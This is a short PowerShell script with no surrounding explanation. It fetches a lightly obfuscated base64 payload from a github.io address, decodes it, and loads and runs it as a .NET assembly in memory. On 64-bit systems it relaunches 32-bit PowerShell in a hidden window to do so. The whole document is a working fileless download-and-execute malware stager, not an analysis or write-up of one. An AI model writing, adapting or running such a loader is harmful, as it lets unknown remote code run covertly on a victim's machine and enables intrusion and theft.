$url = "https://stinkylick.github.io/stinkylick/2/a"
if ([Environment]::Is64BitProcess) {
    Start-Process -FilePath "$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" `
        -ArgumentList "-WindowStyle Hidden -Command 
            `$data = (Invoke-WebRequest -Uri '$url').Content -replace '\[1\]', 'C';
            `$bytes = [System.Convert]::FromBase64String(`$data);
            `$assembly = [System.Reflection.Assembly]::Load(`$bytes);
            `$assembly.EntryPoint.Invoke(`$null, (, [string[]]@()))
        " `
        -WindowStyle Hidden
} else {
    $data = (Invoke-WebRequest -Uri $url).Content -replace '\[1\]','C'
    $bytes = [System.Convert]::FromBase64String($data)
    $assembly = [System.Reflection.Assembly]::Load($bytes)
    $assembly.EntryPoint.Invoke($null, (, [string[]]@()))
}
